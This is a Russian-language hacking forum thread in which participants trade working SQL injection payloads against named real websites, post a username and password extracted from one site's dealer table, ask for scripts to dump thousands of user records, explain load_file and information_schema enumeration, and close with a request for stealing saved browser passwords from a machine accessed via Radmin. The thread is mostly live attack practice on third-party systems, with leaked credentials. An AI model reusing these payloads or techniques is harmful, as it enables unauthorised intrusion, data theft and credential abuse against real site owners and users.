>в mysql? да, если иньекция в select запросе, то update не прокатит >в mssql проходил в mssql можно разделить запрос, в mysql нет...
http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,3,4,unhex(hex(concat(user_id))),6,7,8,9,10+from+dealer-- ampro_micro http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,3,4,unhex(hex(concat(password))),6,7,8,9,10+from+dealer-- eics123 http://www.bitdefenderthailand.com/admin/ -> Login Error :s Whais is The ProbLem ? Help .
а можно ли как-нибудь вызвать ошибку, чтобы отобразился абсолютпуть ну типа "SQL error: You have an error in.... ...." а потом "Line: 666 File: /home/.../.." ?? спасибо
и если load_file ничего не выводит - то это неправильный путь? нету прав? отключен вывод ошибок? что может быть?
hex/unhex - херня cast(blabla as binary) рулит Если прив лоад файл ничего не выводится, то это или 1 или 2-ой вариант первый отпадает если ты указываешь всегда существующий файл (/etc/hosts например) Даже если вывод ошибок включён, при неудачном лоад_файл, сообщение об ошибке не появится
у меня такой вопрос появился... например есть уже раскрученая скуль вида site.com/index.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3+from+user+limit+1,1/* в ней выводится только по одной строке из базы (т.е. надо баловатся с лимитом).. все бы ничего, вот только в базе 9000 записей и ручками их все пребирать будет сложновато... есть ли скрипты которые перебирают лимит от 0 до нужного числа и сохраняют все записи в файл? если у кого нить есть то поделитесь пожалуйста, так каксам я пока что скриптовых языков не знаю, но все еще впереди((=
http://www.voiptraders.co.uk/shop.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7/* выдает ошибку http://www.voiptraders.co.uk/shop.php?id=-3+order+by+17/* а так вроде подобрал таблицы..в чем трабла?
это 3я ветка мускула нет union'а сравни Code: http://www.voiptraders.co.uk/product_details.php?id=216+and+substring(version(),1,1)=5/* Code: http://www.voiptraders.co.uk/product_details.php?id=216+and+substring(version(),1,1)=4/* Code: http://www.voiptraders.co.uk/product_details.php?id=216+and+substring(version(),1,1)=3/* 3й запрос выберет инфу.
Народ, где может храниться информация, находящаяся в базах данных таблицы schemata ? Куча паролей,а откуда непонятно)(
если я правильно тебя понял, то у тебя есть таблицы users например, но ты не знаешь к чему они относятся. чтобы узнать к какой базе они относятся выполни запрос типа: Code: select table_name, table_schema from information_schema.tables; потом, чтобы наверняка вытаскивать данные, запросы будут выглядеть примерно так: Code: select login,password from имя_схемы.users; и то если прав хватит в чужую бд смотреть.
Пасип те Ж)))),Эт новый для Вельки запрос о_О.Я прост думал ещё,как узнать вообще все таблицы в какой-либо из базы в шеме,но принадлежность конкретной таблицы к базе тоже полезно...Права на бд есь,ток не во всех этих бд есть одна и та же папка )).И ещё, особо интересует меня,нахрена там столько баз, если на нём хостится всего три сайта.Вот к примеру,в одной из баз лежит таблица админская,в которой хеш админа.А от чего он не пойму=)),к тому же там не один админский акк,а штук тридцать или больше).Мускула база отдельно лежит.
штобы узнать таблы в одноц базе нужно сначала выбрать базу а потом сделать запрос типа Code: select table_name from information_schem.tables where table_schema='имя_схемы'; возможно к этому серверу бд есть удаленное подключение. попробуй просканить его на порт 3306.
Ребят,имею доступ к компу через радмин.Нужно стырить все пароли на инет,и пассы и акки из строк заполнения в браузерах.Где это может находиться?
